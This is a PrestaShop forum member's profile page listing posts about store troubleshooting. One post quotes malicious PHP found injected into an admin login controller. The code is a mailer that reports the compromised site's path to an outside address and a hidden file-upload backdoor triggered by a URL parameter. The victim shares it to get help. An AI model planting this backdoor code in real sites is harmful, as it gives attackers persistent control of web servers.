Jump to content

Jon T

Members
  • Posts

    13
  • Joined

  • Last visited

Jon T's Achievements

Newbie

Newbie (1/14)

2

Reputation

  1. Hi Shokinro, Thanks for your quick reply. I can confirm that all passwords (User Accounts and FTP) have been changed and, no, there are no free 3rd-party modules installed. I have asked tech support if they can find out who/what changed the file.
  2. I maintain a prestashop site (version. 1.6.0.14) which appears to be recently infected. I noticed a php error on the login screen and on closer inspection, file LoginAdminController.php contained some additional code which looks suspicious. The php error occurred just after an SSL certicate was installed. I replaced the file with the original which fixes the problem but unfortunately the problem seems to reoccur. Here is the 2 snippets of code that have been appearing (email addresses and names edited out): $to = "*******@*******"; $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME']; $header = "from: hacked <*******@******>"; $message .= "Path : " . __file__; $sentmail = @mail($to, $subject, $message, $header); $sentmail1 = @mail($to, $subject, $message, $header); and if($_GET['up']){ if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo"<center><b>Done ==> $userfile_name</b></center>"; Tech support at the hosting company say it is an injection and cannot explain where it has come from. Can anyone shed any light on this and perhaps recommend a course of action?
  3. Many thanks for the contributions in this thread. I have PS 1.5.4.1. I followed the instructions and was able to create an extra occurrence of the module. The only problem is that although the two modules use identically sized banners they display in two different sizes. See algoclear.com on the right hand column. It seems that the second one's dimensions are overided somehow. I have checked the code and they appear to be identical in function. I can't figure out how to fix this. Can anyone shed any light on this? Thanks
  4. I am shocked and disappointed to hear that the module has been removed from the store. I always got the feeling that Prestashop supported the developer community but this decision seems like a big conflict of interest to me. After reading the feedback and reviews of the both modules and weighing up the cost, I recommended Radek's module to my customer. My customer was very happy with the savings and I was very impressed with Radek's excellent support. What's not to like? I don't get it Prestashop.Radek develops a top quality module which he sells and supports for a number of years on your Addon store and then you suddenly pull it. Why? What's wrong with some healthy competition? Please reinstate the module so that others can also benefit from a great product that comes with excellent support.
  5. I want SEO help with a PS site I own. The site only has a handful of electronic products. I have carried out some SEO work myself but I'm disappointed with the results. I am looking for someone who can review the site and produce a list of recommendations to improve the rankings. Please show me examples of sites you have improved the rankings for and how much you will charge to do the review and the changes. Thanks
  6. Hi Vekia, That's it! I couldn't find the duplicates at first until I sorted on PS-CONFIGURATION: name. There are duplicates of other rows too which I believe happened when I performed an upgrade. Many thanks for your help.
  7. I have recently upgraded to PS 1.5.4.1 from 1.2.5.0 and cannot change Order Preferences->General-> Order Process Type to "One-page Checkout". After clicking Save I get the message "The settings have been updated successfully" but after navigating away from the page and back again the setting is unchanged. I have tried to Force Compile the Smarty cache but it has made no difference. In fact, I think the Smarty settings are not updating too! I contacted the host to ask them to enable the Memcache PECL extensions to see if that might help but they wont because its on a shared account. Are there any other solutions that I can try? Thanks
  8. I have just installed the module too and can vouch for the excellent level of support. Would definitely recommend it.
  9. Many thanks Tomerg3. I replicated the order as recommended and your fix did the trick.
  10. This relates to PrestaShop Version 1.2.5.0 - 0.676s. Customers have been experiencing a payment status error on orders placed using PayPal module v1.6. The error is caused because the order total in PrestaShop is a penny different to the PayPal amount which probably points to a rounding problem. It doesn't seem to be an issue for customers using the other payment module (WorldPay). I located a bug report on the issue with a suggested solution by NetLink here: http://www.prestashop.com/bug_tracker/view/3560/ As it relates to PayPal, I would expect this issue to be reported more widely so wonder if there may be other factors causing the problem. Has anyone experienced this issue and solved the problem in a different way?
  11. Besides the Stats tab in the BO, does anyone know whether there is a function that can create a sales report preferably in CSV/Excel format that can be downloaded?
  12. I am experiencing the same problem. The orders on the order admin screen are displaying the invoice PDF icon but not the delivery slip icon. When I go to orders -> delivery slips -> Generate PDF file, I get the following error message: 1 error 1. No delivery slip found for this period Once the delivery slip problem is fixed, will it possible to automatically attach the delivery slip PDF document to an email? I am using version 1.2.5.0 - 0.137s.
×
×
  • Create New...